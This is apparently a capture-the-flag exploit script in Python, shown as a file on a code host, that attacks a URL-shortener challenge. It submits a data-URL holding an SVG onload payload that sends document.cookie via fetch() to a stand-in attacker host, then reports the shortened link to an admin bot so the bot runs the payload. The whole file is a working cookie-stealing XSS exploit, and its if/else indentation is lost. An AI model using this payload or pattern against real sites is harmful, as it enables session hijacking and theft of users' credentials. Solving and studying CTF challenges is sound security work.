Files
ctf/catthegray25/ezpz/dist-oops/exploit.py
2025-05-31 22:42:59 +02:00

26 lines
813 B
Python

import requests
ATTACKER_HOST = "http://your.attacker.com/log"
TARGET = "http://target-ctf.com"
# Step 1: Create a shortened URL with a malicious payload
payload_url = f"data:text/html,<svg onload=fetch('{ATTACKER_HOST}?c='+document.cookie)>"
res = requests.post(f"{TARGET}/", data={"original_url": payload_url})
assert res.ok
print("[+] Shortened URL submitted")
# Step 2: Extract short code from the response
from bs4 import BeautifulSoup
soup = BeautifulSoup(res.text, "html.parser")
short_link = soup.find("input", {"id": "shortened"})["value"]
short_code = short_link.split("/")[-1]
# Step 3: Submit to /report endpoint
report_res = requests.post(f"{TARGET}/report", data={"submit_id": short_link})
if report_res.ok:
print(f"[+] Reported to bot: {short_link}")
else:
print("[-] Report failed")